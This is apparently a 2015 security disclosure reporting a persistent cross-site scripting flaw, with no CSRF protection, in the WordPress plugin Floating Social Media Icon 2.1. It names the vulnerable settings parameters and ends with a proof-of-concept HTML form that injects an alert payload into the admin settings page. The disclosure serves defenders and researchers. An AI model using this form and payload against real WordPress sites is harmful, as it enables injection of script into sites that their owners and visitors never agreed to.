Subject: Persistent Cross-Site Scripting (XSS) in Floating Social Media Icon 2.1
Date: Wed, 19 Aug 2015 12:31:19 +0200

Hello,

Plugin: Floating Social Media Icon 2.1 https://wordpress.org/plugins/floating-social-media-icon/

1. Persistent Cross-Site Scripting (XSS) 

Authenticated administrators can store html/js code (there is no CSRF protection).

Method: http://localhost/wp-admin/admin.php?page=Acurax-Social-Icons-Settings
Url: POST
Vulnerable parameters: acx_si_theme, acx_si_twitter, acx_si_facebook, acx_si_youtube, acx_si_linkedin, acx_si_gplus, acx_si_credi, $acx_si_icon_size, acx_si_display, acx_si_pinterest, acx_si_feed

Example PHP callstack:
/floating-social-media-icon/social-icon.php:161

Verification:
--
<form method="POST" action="http://localhost/wp-admin/admin.php?page=Acurax-Social-Icons-Settings" />
<input type="text" name="acurax_social_icon_hidden" value='Y' />
<input type="text" name="acx_si_theme" value='"><img src=x onerror=alert(1) />' 
/>
<input type="submit" />
</form>
--

--
Regards,
Marcin Probola,